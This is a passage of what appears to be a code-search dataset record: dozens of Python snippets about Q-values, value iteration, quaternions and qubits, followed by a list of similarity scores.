query[:le]:\n if le == len(query):\n found = inset\n el.mks0 = inset.mks0\n el.mks1 = inset.mks1\n el.mks2 = inset.mks2\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n else:\n found = None\n el.mks0 = 0\n el.mks0_ = 0\n el.mks1 = inset.mks1 + len(query) - le\n el.mks1_ = le\n el.mks2 = inset.mks2 + len(query) - le\n el.mks2_ = le\n else:\n found = None\n el.mks0 = len(query)\n el.mks1 = len(query)\n el.mks2 = len(query)\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n else:\n found = None\n el.mks0 = len(query)\n el.mks1 = len(query)\n el.mks2 = len(query)\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n\n yield el, found", "def computeQValueFromValues(self, state, action):\n #get the Transition function and nextStates\n state_prob_pair=self.mdp.getTransitionStatesAndProbs(state,action)\n #initialize the value to zero\n actual_value=0\n #iterate over probabilities (transition functions) and next states\n for pair in state_prob_pair:\n #compute qvalue\n actual_value+=pair[1]*(self.mdp.getReward(state,action,pair[0])+self.discount*self.values[pair[0]])\n #print \"The Q value is \",actual_value\n return actual_value", "def get(self, action: Action) -> Qval:\n b_q_values = self.with_batch_dim(self.q_values)\n return b_q_values.gather(1, action.long().view(-1, 1)).squeeze(1)", "def computeValueFromQValues(self, state):\n \"*** YOUR CODE HERE ***\"\n valueList = []\n ############################################################################################################ Eric Changed state to self.index\n for a in state.getLegalActions(self.index):\n valueList.append(self.getQValue(state, a))\n if len(valueList) == 0:\n return 0.0\n return max(valueList)\n\n\n util.raiseNotDefined()", 
"def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n\n return self.values[(str(state), action)]", "def setQ(self,Q):\n self.Q = Q", "def expand_q(self) -> Q:\n \"\"\"Expand each term.\"\"\"\n\n self.t = sp.expand(self.t)\n self.x = sp.expand(self.x)\n self.y = sp.expand(self.y)\n self.z = sp.expand(self.z)\n return self", "def calc_q_values_1(self, state):\n return self._sess.run(self._q_pred_1,\n feed_dict={self._state_placeholder:state});", "def q_value(self, state_action):\n state, action = state_action\n hashable_state = self.represent_state(state)\n if not (hashable_state, action) in self.q_values:\n self.q_values[hashable_state, action] = self.reward(Game.game_state(state))\n return self.q_values[hashable_state, action]", "def get_qs(self, state):\n state = state.astype(np.float32)\n if len(state.shape) == 3:\n state = state.reshape([1] + list(self.input_shape))\n return self.session.run(self.q_policy,\n feed_dict={self.s_placeholder: state})", "def q_values(self, state):\n return self.sess.run(self.graph.target_q_values,\n feed_dict={self.graph.states: [state]}).reshape(-1)", "def update_q_value(q_table: np.ndarray, state: int, action: int,\n learning_rate: float, current_reward: float,\n new_state: int, discount_rate: float) -> None:\n q_table[state, action] = new_q_value(q_table, state, action, learning_rate,\n current_reward, new_state,\n discount_rate)", "def get_qvalues(self, prev_state, obs_t):\r\n obs_t = torch.tensor(obs_t, device=self.device, dtype=torch.float)\r\n (h, c), qvalues = self.forward(prev_state, obs_t)\r\n return (h.detach(), c.detach()), qvalues.data.cpu().numpy()", "def get_exact(self):\n from sympy.polys.domains import QQ\n return QQ", "def computevaluefromqvalues(self, state):\n legalactions = env.getlegalactions(deepcopy(env.state_to_array(state)))\n if len(legalactions) == 0:\n return 0.0\n tmp = Counter()\n for action in legalactions:\n tmp[action] = self.getqvalue(state, action)\n return tmp[tmp.argMax()]", "def computeValueFromQValues(self, state):\n \"*** YOUR CODE HERE ***\"\n self.Temporary_QValue = util.Counter() #initializing a temporary QValue counter\n\n temporary_QValue = self.Temporary_QValue\n\n maxAction_OverLegalAction = self.getPolicy(state) #Calls get poilcy which in turn calls the computeActionFromQValues function to get the action we need to take\n\n if maxAction_OverLegalAction == 0: #checks if returned state is terminal state\n return 0.0\n\n temporary_QValue[maxAction_OverLegalAction] = self.getQValue(state,maxAction_OverLegalAction) #to get the Qvalue of the action returned from computeActionFromQValues function\n\n\n return temporary_QValue[maxAction_OverLegalAction] #Returns the max_action Q(state,action)\n #util.raiseNotDefined()", "def simple_q(self: Qs) -> Qs:\n\n new_states = []\n\n for ket in self.qs:\n new_states.append(ket.simple_q())\n\n return Qs(\n new_states, qs_type=self.qs_type, rows=self.rows, columns=self.columns\n )", "def apriori(q, q_pvalue, insig, sig):\r\n\r\n insignificant = [] + insig\r\n significant = [] + sig\r\n\r\n while len(q) > 0:\r\n element = q[0]\r\n if isinstance(element, int):\r\n element = tuple([element]) # it easier to just convert this to a tuple (so everything is the same data type)\r\n\r\n pvalue = q_pvalue[element] # chi-squared test, verify if the given element satisfies the support criterion\r\n\r\n if pvalue == 1:\r\n significant.append(element)\r\n #print significant\r\n for i in range(element[-1]+1,4):\r\n if i not in insignificant:\r\n #print i, \"#####\", element\r\n 
tentativeCandidate = tuple(sorted(list(element)+[i])) # add the two lists together (element is a list)\r\n if tentativeCandidate not in q and tentativeCandidate not in significant: # then add it to the queue\r\n #print \"Queue {}\\nTentative Candidate{}\\nSignificant {}\\nInsignicant {}\\n\" \\\r\n # \"##################################\".format(q,tentativeCandidate,significant,insignificant)\r\n q.append(tentativeCandidate)\r\n yield q,tentativeCandidate,significant,insignificant\r\n q.pop(0) #remove it from the queue after we have created/tried all the tentativeCandidates\r\n\r\n else: # when the p-value not significant\r\n q.pop(0)\r\n insignificant.append(element)\r\n yield q,tentativeCandidate,significant,insignificant\r\n else:\r\n yield q,tentativeCandidate,significant,insignificant # grab the last values before breaking out of the while loop\r", "def update_q_values(self, state, value):\n if self.prev_state is not None and self.learning:\n reward = self.reward(Game.game_state(state))\n self.q_values[self.represent_state(self.prev_state), self.prev_action] += self.alpha * (\n reward + self.gamma * value - self.prev_q_val)", "def getQValue(self, state, action):\n \"*** YOUR CODE HERE ***\"\n # OUR CODE HERE\n #get the value of the state\n qVal = self.values[state]\n #iterate through the MDP transition states from the current state\n for transitionState, probability in self.mdp.getTransitionStatesAndProbs(state, action):\n #q value = discount * expected value of reward of state\n qVal += self.discount * probability * self.values[transitionState]\n return qVal\n # END OUR CODE", "def Q(self):\n return self._Q", "def computeQValueFromValues(self, state, action):\n # assign q value to 0\n qvalue = 0\n\n # get the possible transition states and actions\n possible_tansition = self.mdp.getTransitionStatesAndProbs(state, action)\n\n # for each transition in list of possible transitions\n # transition[0] has the successor state (s-prime) represented in co-ordinates\n for transition in possible_tansition:\n\n # calculate reward transition\n reward = self.mdp.getReward(state, action, transition[0])\n\n # transition[1] has the probablity of reaching a particular successor state (s-prime) from state, action pair\n probability = transition[1]\n\n # get the utility value from tansition[0] which has successor state represented in coordinates\n utility_value = self.getValue(transition[0])\n\n # compute q value collectively using reward and probability transition\n qvalue = qvalue + (probability * (reward + (self.discount * utility_value)))\n\n # return q value\n return qvalue", "def value(self) -> global___Expression:", "def value(self) -> global___Expression:", "def __init__(self):\n self.q1 = []\n self.q2 = []", "def __init__(self):\n self.q1 = []\n self.q2 = []", "def calc_q_values(self, state):\n state = state[None, :, :, :]\n return self.q_network.predict_on_batch(state)", "def __init__(self):\n self.q1 = []", "def q(self):\n return self._q", "def Q(self, state, action):\n return self[state, action]", "def __init__(self):\n {}\n #generate a monoid Q\n self.monoid_Q = self.generateQ()[0]\n self.relationOfElements_Q = self.generateQ()[1]\n self.p_Position = self.generateQ()[2]\n self.qOfPosition = self.generateQ()[3]\n #print(self.qOfPosition)", "def test_set_1(self):\n\n qubit.set(1, 0)\n\n result = qubit.measure(polarization)\n self.assertEqual(1, result)", "def Q(self, observation, action):\n return self[observation, action]", "def computeValueFromQValues(self, state):\n \"*** YOUR CODE HERE 
***\"\n if not self.getLegalActions(state): return 0\n\n best_action = self.computeActionFromQValues(state)\n return self.getQValue(state, best_action)", "def _prepare(self, q):\n # store it in _lastr which is consulted in BasePDFGenerator.__call__\n self._lastr = q\n self._calc.qstep = q[1] - q[0]\n self._calc.qmin = q[0]\n self._calc.qmax = q[-1] + 0.5*self._calc.qstep\n return", "def computeQValueFromValues(self, state, action):\n \n \n next_states_probs = self.mdp.getTransitionStatesAndProbs(state, action)\n # liste des recompenses R(s,a,s')\n rewards = []\n # liste des probas de transitions P(s'|a,s)\n probs = []\n # liste des Vk(s')\n previous_values = []\n # occurence[0] = les next_state\n # occurence[1] = les proba de transi\n for occurence in next_states_probs:\n rewards.append(self.mdp.getReward(state, action, occurence[0]))\n probs.append(occurence[1])\n previous_values.append(self.getValue(occurence[0]))\n Q_value = 0\n # boucle qui calcule somme des ( P(s'|a,s) * [R(s,a,s') + gamma * Vk(s')] ) sur les s'\n for i in range(len(probs)):\n Q_value += probs[i] * (rewards[i] + self.discount * previous_values[i])\n \n return Q_value\n util.raiseNotDefined()", "def q(self) -> List[Qubit]:\n return self._qubits", "def getQValue(self, state, action):\n \"\"\"Description:\n [Enter a description of what you did here.]\n Use first equation in slide 71 of MDP to compute q-value depond on weights and current features.\n \n !! But I think what I did is not work for IdentityExtractor. Because feature of IdentityExtrator always return 1,\n it did not change even a ghost is closing.\n \"\"\"\n \"\"\" YOUR CODE HERE \"\"\"\n # if weight is empty, then weight will need to initial to 1 for all features\n # According to which Extractor user choose, weight counter will have equal number of keys.\n if len(self.weight) == 0:\n feat = self.featExtractor.getFeatures(state, action)\n self.weight.incrementAll(feat.keys(), 1)\n \n qValue = self.weight * self.featExtractor.getFeatures(state,action)\n return qValue\n \"\"\" END CODE \"\"\"", "def computeQValueFromValues(self, state, action):\n \"*** YOUR CODE HERE ***\"\n qValue = 0\n transitions = self.mdp.getTransitionStatesAndProbs(state, action)\n #print('Transitions: ' + str(transitions))\n for t in transitions:\n nextState, prob = t\n reward = self.mdp.getReward(state, action, nextState)\n #print('Reward: ' + str(reward))\n oneTransition = prob * (reward + self.discount * self.values[nextState])\n qValue = qValue + oneTransition\n return qValue", "def M(self, q):\n\n # check for function in dictionary\n if self._M is None:\n self._M = self._calc_M()\n parameters = tuple(q)\n return np.array(self._M(*parameters), dtype='float32')", "def qval(self, **kwargs):\n raise ValueError(\"This function is not available in lazy results evaluation as it would \"\n \"require all pairwise tests to be performed.\")", "def vector_q(q_1: Q) -> Q:\n\n end_q_type = f\"vector_q({q_1.q_type})\"\n\n v = Q(\n [0, q_1.x, q_1.y, q_1.z],\n q_type=end_q_type,\n representation=q_1.representation,\n )\n return v" ]
[ "0.62951297", "0.6088538", "0.6056516", "0.5923299", "0.5866351", "0.5854476", "0.57913595", "0.57575697", "0.57466906", "0.5684224", "0.5621595", "0.55795395", "0.55610085", "0.55451214", "0.54641014", "0.5457697", "0.544126", "0.5425461", "0.5354141", "0.53406006", "0.53403276", "0.53275746", "0.5326045", "0.53053916", "0.52839494", "0.5270501", "0.5261488", "0.52555704", "0.5245386", "0.5235252", "0.5234572", "0.5226508", "0.5223305", "0.52159226", "0.5213902", "0.52102065", "0.5197988", "0.5197988", "0.5197988", "0.5197988", "0.51908207", "0.5185477", "0.5165913", "0.51631665", "0.5161437", "0.5153007", "0.515272", "0.5152139", "0.51487327", "0.514783", "0.51470786", "0.5142468", "0.513121", "0.5127432", "0.51203924", "0.51046926", "0.5091653", "0.50809485", "0.50797963", "0.5066822", "0.506662", "0.5066027", "0.50617987", "0.50606763", "0.504766", "0.5046093", "0.5041201", "0.5039997", "0.50379664", "0.5030351", "0.50280774", "0.50266814", "0.50257695", "0.5025432", "0.5025309", "0.5021881", "0.50171", "0.50094575", "0.5009225", "0.49981734", "0.49969003", "0.49969003", "0.49912062", "0.49912062", "0.49911994", "0.49765843", "0.4970707", "0.49682525", "0.4952539", "0.49486855", "0.49448", "0.49342364", "0.49337745", "0.49218845", "0.49213693", "0.49209076", "0.49191865", "0.49126405", "0.4912528", "0.48883286" ]
0.53853166
18
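Neither the TabularQ class used in the query above nor its internals are shown anywhere in this dump, so the doctest cannot be run as-is. Below is a minimal sketch that satisfies the interface the value record assumes (a list of actions plus set/get of Q(s,a)); the class layout is an assumption, only the method names come from the record itself.

# Minimal assumed sketch of TabularQ; the real class in the source exercise may differ.
class TabularQ:
    def __init__(self, states, actions):
        self.states = states
        self.actions = actions
        # Default every Q(s, a) to 0.0 until it is explicitly set.
        self.q = {(s, a): 0.0 for s in states for a in actions}

    def set(self, s, a, v):
        self.q[(s, a)] = v

    def get(self, s, a):
        return self.q[(s, a)]


def value(q, s):
    # V(s) = max_a Q(s, a), as in the document field above.
    return max(q.get(s, a) for a in q.actions)


if __name__ == "__main__":
    q = TabularQ([0, 1, 2, 3], ['b', 'c'])
    q.set(0, 'b', 5)
    q.set(0, 'c', 10)
    assert value(q, 0) == 10  # matches the doctest in the query field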
Return pi(s) based on a greedy strategy.
>>> q = TabularQ([0,1,2,3],['b','c'])
>>> q.set(0, 'b', 5)
>>> q.set(0, 'c', 10)
>>> q.set(1, 'b', 2)
>>> greedy(q, 0)
'c'
>>> greedy(q, 1)
'b'
def greedy(q, s):
    # Your code here
    return argmax(q.actions, lambda a: q.get(s, a))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def epsilon_greedy(q, s, eps = 0.5):\n if random.random()<eps:\n return uniform_dist(q.actions).draw()\n else:\n return greedy(q,s)", "def greedy():\n return constant(0)", "def greedy_policy(self):\n return defaultdict(lambda: 0)", "def greedy(initial_state, heuristic, dimension=3):\n\n\tdef add_cost(node):\n\t\tnode.cost = heuristic(node.state)\n\n\treturn search(initial_state, Frontier(PriorityQueue), dimension, cost_fn=add_cost)", "def q_greedify_policy(env, V, pi, s, gamma):\n ### START CODE HERE ###\n ##q(s,a)=sigma(P(ss')*(gamma*V(s')+R(s,a,s'))\n q = np.zeros((env.action_space.n))\n for idx, action in enumerate(range(env.action_space.n)):\n for prob_next_state, next_state, reward_next_state, done in env.P[s][action]:\n q[idx] += prob_next_state * ((gamma * V[next_state]) + reward_next_state)\n\n greedy_action = np.argmax(q)\n # print(greedy_action)\n for action, action_prob in enumerate(pi[s]):\n if action == greedy_action:\n print(action, greedy_action)\n pi[s][action] = 1\n else:\n pi[s][action] = 0", "def eps_greedy(Q, epsilon, num_actions):\n if np.random.uniform(0,1,1) > epsilon:\n action = np.argmax(Q)\n else:\n action = np.random.randint(low=0, high=num_actions)\n \n Q_value = Q[action]\n return action, Q_value", "def greedy_proportional_strategy(our_hist, their_hist):\n if len(our_hist) == 0 or len(their_hist) == 0:\n return choice(CHOICES)\n freqs = count(their_hist)\n prediction_for_them = np.argmax(freqs)\n return CHOICES[(prediction_for_them + 1) % 3]", "def greedy(self):\n n_step_t = self.filter['n_step_t']\n n_traj = self.filter['n_traj']\n traj = self.filter['traj']\n steps = [0 for i in xrange(n_step_t)]\n for i in xrange(n_traj):\n n_step = traj[i]['n_step']\n for j in xrange(n_step):\n steps[j] += 1\n self.filter['steps'] = steps\n \n return", "def epsilon_greedy(Q, epsilon, state):\n random_number = random.random()\n if (random_number < epsilon) and (state not in critical_states):\n return env.action_space.sample()\n\n else:\n return np.argmax(Q[state])", "def greedy_eps(self, Q):\r\n s = self.get_state()\r\n s_x, s_y = s[0][0], s[0][1]\r\n s_vx, s_vy = s[1][0], s[1][1]\r\n if np.random.rand() > self.EPS:\r\n print(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n if (np.max(Q[s_x, s_y, s_vx, s_vy, :, :]) ==\r\n np.min(Q[s_x, s_y, s_vx, s_vy, :, :])):\r\n a = (0, 0)\r\n else:\r\n a = np.argmax(Q[s_x, s_y, s_vx, s_vy, :, :])\r\n a = np.unravel_index(a, (3, 3)) - np.array([1, 1])\r\n a = (a[0], a[1])\r\n else:\r\n a = self.action_to_tuple(random.randrange(9))\r\n\r\n return a", "def test_greedy_strategy():\n tiles = Tiles(800, 100)\n board = Board(800, 100, tiles)\n player = Player('Alfred', board, 'black')\n ai = AI(board, player)\n for i in range(board.count//2 + 1, board.count - 1):\n board.add_tile(i, board.count//2 - 1, 'black')\n assert ai.greedy_strategy()[0] == (board.count - 1, board.count//2 - 1)\n assert len(ai.greedy_strategy()[1]) == board.count//2 - 1\n board.add_tile(board.count//2 - 1, 0, 'white')\n for i in range(1, board.count - 1):\n if board.tiles_list[board.count//2 - 1][i] is None:\n board.add_tile(board.count//2 - 1, i, 'black')\n else:\n board.tiles_list[board.count//2 - 1][i].color = 'black'\n assert ai.greedy_strategy()[0] == (board.count//2 - 1, board.count - 1)\n assert len(ai.greedy_strategy()[1]) == board.count - 2", "def epsilon_greedily_update_policy(self, current_Q, iterations_completed):\n iteration = iterations_completed+1\n # epsilon = min(1/np.log(iterations_completed+.0001),1)\n # epsilon = 1/iteration\n epsilon = 0.1\n def 
new_policy(state):\n heads = True if random.random() < epsilon else False # Flip our epsilon greedy coin\n if heads: # If heads comes up, choose random action\n return random.randint(0, self.nA-1)\n else: # If tails comes up, choose greedy option\n return np.argmax(current_Q[state]['Q(s,a)'])\n return new_policy", "def heart(q):\n l = []\n j = 1\n bound = 4 * arith1.floorsqrt(q)\n for p in prime.generator():\n if p != q:\n l.append(p)\n j *= p\n if j > bound:\n break\n return l", "def make_epsilon_greedy_policy(Q, epsilon, nA):\n def policy_fn(observation):\n if random.random() < (1 - epsilon):\n return np.argmax(Q[observation])\n else:\n return random.choice(np.arange(nA))\n\n return policy_fn", "def PaleyGraph(q):\n from sage.rings.finite_rings.integer_mod import mod\n from sage.rings.finite_rings.finite_field_constructor import FiniteField\n from sage.arith.all import is_prime_power\n assert is_prime_power(q), \"Parameter q must be a prime power\"\n assert mod(q,4)==1, \"Parameter q must be congruent to 1 mod 4\"\n g = Graph([FiniteField(q,'a'), lambda i,j: (i-j).is_square()],\n loops=False, name = \"Paley graph with parameter %d\"%q)\n return g", "def _greedy(self, state):\n\n node = self.mcts_head\n if self.verbose > 1:\n logger.debug(f\"Starting greedy algorithm.\")\n\n while not node.terminal:\n # Parse current state\n this_state, total_reward, terminal = self._parse_path(state, node.path)\n node.set_terminal(terminal)\n if self.verbose > 1:\n logger.debug(f\" Analyzing node {node.path}\")\n\n # Expand\n if not node.terminal and not node.children:\n actions = self._find_legal_actions(this_state)\n step_rewards = [self._parse_action(action, from_which_env=\"sim\") for action in actions]\n if self.verbose > 1:\n logger.debug(f\" Expanding: {len(actions)} legal actions\")\n node.expand(actions, step_rewards=step_rewards)\n\n # If terminal, backup reward\n if node.terminal:\n if self.verbose > 1:\n logger.debug(f\" Node is terminal\")\n if self.verbose > 1:\n logger.debug(f\" Backing up total reward {total_reward}\")\n node.give_reward(self.episode_reward + total_reward, backup=True)\n\n # Debugging -- this should not happen\n if not node.terminal and not node.children:\n logger.warning(\n f\"Unexpected lack of children! 
Path: {node.path}, children: {node.children.keys()}, legal actions: {self._find_legal_actions(this_state)}, terminal: {node.terminal}\"\n )\n node.set_terminal(True)\n\n # Greedily select next action\n if not node.terminal:\n action = node.select_greedy()\n node = node.children[action]\n\n if self.verbose > 0:\n choice = self.mcts_head.select_best(mode=\"max\")\n self._report_decision(choice, state, \"Greedy\")", "def greedy_policy(self, q, s):\n\t\tresult = []\n\t\tif q is None:\n\t\t\treturn result\n\t\tmax_val = q[0]\n\t\tfor action in self.feasible_actions_in_state(s):\n\t\t\tq_value = q[action]\n\t\t\tif q_value == max_val:\n\t\t\t\tresult.append(action)\n\t\t\telif q_value > max_val:\n\t\t\t\tresult = [action]\n\t\t\t\tmax_val = q_value\n\t\treturn result", "def eps_greedy_policy(q_values, eps, forbidden_actions):\r\n\r\n q_values[forbidden_actions] = np.NINF\r\n indices = torch.nonzero(q_values == q_values.max())\r\n random_index = random.randint(0, indices.shape[1]-1)\r\n best_action_index = indices[random_index]\r\n l = len(q_values)\r\n n_forbidden_actions = np.count_nonzero(forbidden_actions)\r\n p = eps / (l-n_forbidden_actions)\r\n\r\n policy = np.full([l], p)\r\n policy[forbidden_actions] = 0\r\n policy[best_action_index] += 1 - eps\r\n\r\n return policy", "def query_recursive(self, p, q):\n if q <= p:\n return self.e()\n return self._query_recursive(p, q, 0, 0, self.n)", "def lotteryPendingQueue(ipSet):\n\t# make list of possible predicates and remove duplicates\n\tpredicates = [ip.predicate for ip in ipSet]\n\tseen = set()\n\tseen_add = seen.add\n\tpredicates = [pred for pred in predicates if not (pred in seen or seen_add(pred))]\n\n\t#choose the predicate\n\tweightList = np.array([pred.num_tickets for pred in predicates])\n\ttotalTickets = np.sum(weightList)\n\tprobList = np.true_divide(weightList, totalTickets)\n\tchosenPred = np.random.choice(predicates, p=probList)\n\n\t#choose the item and then ip\n\tchosenPredSet = ipSet.filter(predicate=chosenPred)\n\titem = chooseItem(chosenPredSet)\n\tchosenIP = ipSet.get(predicate=chosenPred, item=item)\n\n\t# if this ip is not in the queue\n\tif not chosenIP.is_in_queue:\n\t\tchosenIP.add_to_queue()\n\n\tchosenIP.refresh_from_db()\n\t# if the queue is full, update the predicate\n\treturn chosenIP", "def get_greedy_action(Q, obs):\n obs = Q.xp.asarray(obs[None], dtype=np.float32)\n with chainer.no_backprop_mode():\n q = Q(obs).data[0]\n return int(q.argmax())", "def greedy(self) -> torch.Tensor:\n return self.with_batch_dim(self.q_values).argmax(1).squeeze()", "def enumerate_test_metric(\n self, qset: Iterator[Tuple[str, float]]\n ) -> Iterator[Tuple[CompletionElement, CompletionElement]]:\n qset = sorted(qset)\n current = 0\n for query, weight in qset:\n while current < len(self) and self[current].value <= query:\n current += 1\n ind = current - 1\n el = CompletionElement(query, weight)\n if ind >= 0:\n inset = self[ind]\n le = len(inset.value)\n if le <= len(query) and inset.value == query[:le]:\n if le == len(query):\n found = inset\n el.mks0 = inset.mks0\n el.mks1 = inset.mks1\n el.mks2 = inset.mks2\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n else:\n found = None\n el.mks0 = 0\n el.mks0_ = 0\n el.mks1 = inset.mks1 + len(query) - le\n el.mks1_ = le\n el.mks2 = inset.mks2 + len(query) - le\n el.mks2_ = le\n else:\n found = None\n el.mks0 = len(query)\n el.mks1 = len(query)\n el.mks2 = len(query)\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n else:\n found = None\n el.mks0 
= len(query)\n el.mks1 = len(query)\n el.mks2 = len(query)\n el.mks0_ = len(query)\n el.mks1_ = len(query)\n el.mks2_ = len(query)\n\n yield el, found", "def greedy_search(self,\r\n inputs,\r\n closed,\r\n **kwargs):\r\n\r\n return self.call(inputs, **kwargs), closed", "def epsilon_greedy_probs(self, nA, Q_s, i_count, eps=None):\r\n epsilon = 1.0 / i_count\r\n if eps is not None:\r\n epsilon = eps\r\n \r\n policy_s = np.ones(nA) * epsilon / nA\r\n policy_s[np.argmax(Q_s)] = 1 - epsilon + (epsilon / nA)\r\n return policy_s", "def eps_greedy_action(self, phi, tabu):\n\n # increase counter of actions taken\n self.a_count += 1\n\n # if within the initial buffer before learning starts, random action\n aval_actions = None\n if self.a_count < self.warmup:\n\n if len(tabu) > 0:\n # Remove tabu actions from list of available actions\n aval_actions = [a for a in self.actions if a not in tabu]\n\n action = self.random_action(aval_actions)\n return action, None\n\n elif (self.a_count == self.warmup) and self.verbose:\n print('learning starts')\n\n # evaluate Q(phi, a) for each action\n qvalues = self.Qmodel.predict(phi, batch_size=1)[0]\n\n # generate random value\n randn = np.random.uniform()\n\n # eliminate tabu values from possible actions to pick\n aval_actions = None\n if len(tabu) > 0:\n if randn < self.epsilon:\n aval_actions = [a for a in self.actions if a not in tabu]\n else:\n # Update Qs to low values to ensure they are not picked\n tabu_idx = [i for i in range(self.num_actions) if self.actions[i] in tabu]\n qvalues[tabu_idx] = -9999\n\n # eps-greedy, select random action\n if randn < self.epsilon:\n action = self.random_action(aval_actions)\n a_i = self.action_str2idx(action)\n else:\n # select best action\n a_i = np.argmax(qvalues)\n action = self.actions[a_i]\n\n # update greedy parameter and action count\n self.epsilon *= self.discount_epsilon\n self.a_count += 1\n\n return action, qvalues[a_i]", "def make_epsilon_greedy_policy(Q, epsilon, nA):\n\n def policy_fn(observation):\n\n # get random number\n random_number = random.uniform(0, 1)\n\n # get actions with maximum value\n greedy_actions = np.argwhere(Q[observation] == np.amax(Q[observation])).squeeze()\n if not len(greedy_actions.shape):\n greedy_actions = [greedy_actions]\n action = random.choice(greedy_actions)\n\n # if number less than epsilon, get random other actions\n if random_number <= epsilon:\n all_actions = list(range(0, nA))\n if not len(greedy_actions) == nA:\n action = random.choice(all_actions)\n\n return int(action)\n\n return policy_fn", "def genKeys(p, q):\r\n n = p * q\r\n phi = (p-1)*(q-1)\r\n #e = findE(phi, p, q)\r\n e = findE(phi)\r\n \r\n d = ext_Euclid(phi, e) #Using the extended Euclidean algorithm to compute d\r\n if (d < 0):\r\n d += phi\r\n print (\"n = \"+ str(n))\r\n print (\"phi(n) = \"+ str(phi))\r\n print (\"e = \"+ str(e))\r\n print (\"d = \"+ str(d))\r\n print\r\n return n, e, d", "def p_to_q(pvalues, display_on=False, cut1s=False, set_pi_hat=False):\n # because fisher's exact test gives highly skewed pvalue dists (with P of 1)\n # it may be necessary to remove the 1s before analysing\n if cut1s:\n pvalues = [ps for ps in pvalues if ps < 1]\n\n # order p-values:\n pvalues.sort()\n\n # estimate pi0:\n # evaluate pi0 across the range of lambda:\n lamrange = numpy.arange(0,0.95,0.01)\n #pbeaters = [ sum( p > lam for p in pvalues) for lam in lamrange ]\n #denominator = [ (len(pvalues) * (1 - lam)) for lam in lamrange ]\n pi0_lam = [ (sum( p > lam for p in pvalues) / (len(pvalues) * (1 - lam))) for lam 
in lamrange ]\n #pi0_hardway = []\n\n #for i in range(len(pbeaters)):\n # pi0_hardway += [ pbeaters[i] / denominator[i] ]\n #if pi0_lam != pi0_hardway:\n # print \"\\n\\n\\npi0_lam is not the same as pi0_hardway!\\n\\n\"\n #print \"pi0_hardway length:\", len(pi0_hardway)\n #print \"p_values size:\", len(pvalues)\n # fit cubic spline to data, then calculate value of pi0 for lambda = 1:\n tck = interpolate.splrep(lamrange, pi0_lam, s=3)\n splinecurve = interpolate.splev(numpy.arange(0,1.0,0.01), tck, der=0)\n pi0_hat = interpolate.splev(1, tck, der=0)\n tck_half = 0\n if pi0_hat > 1:\n tck_half = interpolate.splrep(lamrange[:85], pi0_lam[:85], s=3)\n spline_half = interpolate.splev(numpy.arange(0,1.0,0.01), tck_half, der=0)\n pi0_hat_half = interpolate.splev(1, tck_half, der=0)\n pi0_hat = pi0_hat_half\n verbalise(\"R\", \"pi0_hat > 1! Likely skewed P-value distribution. Converting to \", pi0_hat_half)\n if set_pi_hat:\n pi0_hat = set_pi_hat\n if display_on:\n fig = plt.figure()\n ax1 = fig.add_subplot(111)\n try:\n n, bins, patches = ax1.hist(pvalues, bins=20, facecolor='green', label=\"P-values\")\n except IndexError:\n ax1.plot(pvalues)\n plt.title('distribution of P-values')\n ax1.set_xlabel('lambda / P-value')\n ax1.set_ylabel('distribution #')\n plt.legend(loc=4)\n ax2 = ax1.twinx()\n ax2.plot(lamrange, pi0_lam, 'ro', numpy.arange(0,1.0,0.01), splinecurve, 'r', label='pi0_hat, s=3' )\n if tck_half != 0:\n ax2.plot(lamrange[:95], spline_half[:95], 'b', label='lambda < 0.85')\n ax2.set_ylabel('pi0_hat(lambda)')\n #ax1.plot(t, s1, 'b-')\n plt.legend(loc=1)\n plt.show()\n\n\n q_pm = pi0_hat * pvalues[-1] # q(pm)\n # creates an ordered list of q(p(i)) values.\n q_pi_list = [q_pm] + [ (pi0_hat * len(pvalues)*pvalues[i])/i for i in range(len(pvalues)-1,1,-1)]\n # \"The estimated q value for the ith most significant feature is q(p(i))\"\n q_val = {}\n for i in range(len(pvalues)):\n q_val[pvalues[-1 * (i+1)]] = min(q_pi_list[:i+1])\n\n return q_val", "def greedy(self) -> Action:\n return NotImplemented", "def make_epsilon_greedy_policy(Q, epsilon, nA):\n def policy_fn(observation):\n A = np.ones(nA, dtype=float) * epsilon / nA\n best_action = np.argmax(Q[observation])\n A[best_action] += (1.0 - epsilon)\n return A\n return policy_fn", "def greedy(constraint, indexes, m_l, parallel=False):\n\n selected = np.array([])\n plot = False\n choices = np.array(indexes)\n bar = ChargingBar(\"Calculating index set with greedy method\", max=m_l)\n\n for i in range(len(selected), m_l):\n # print(\"i = %d\" % i)\n start = time.time()\n\n def calc(node):\n return constraint(np.union1d(selected, node))\n\n if parallel:\n pickle_fix.calc = calc\n available_cores = odin.config.get(\"available_cores\", 4)\n pool = multiprocessing.Pool(processes=available_cores)\n values = pool.map(pickle_fix, choices)\n pool.close()\n else:\n # values: [float]\n values = list(map(calc, choices))\n\n greedy_choice = choices[np.argmax(values)]\n\n if plot:\n values = np.sort(values)\n oplt.plot(values)\n oplt.show()\n # current_best = np.max(values)\n\n selected = np.union1d(selected, [greedy_choice])\n choices = np.setdiff1d(choices, [greedy_choice])\n logging.debug(\"selected = %s; choice = %s; time = %.5f\" % (\n selected, greedy_choice, time.time() - start))\n bar.next()\n bar.finish()\n\n return selected", "def test_greedy_partition(self):\r\n\r\n #(non) partition into one bucket\r\n obs_part, obs_levels = greedy_partition({'1': 2,\r\n '2': 1,\r\n '3': 3}, 1)\r\n self.assertEquals(obs_levels, [6])\r\n 
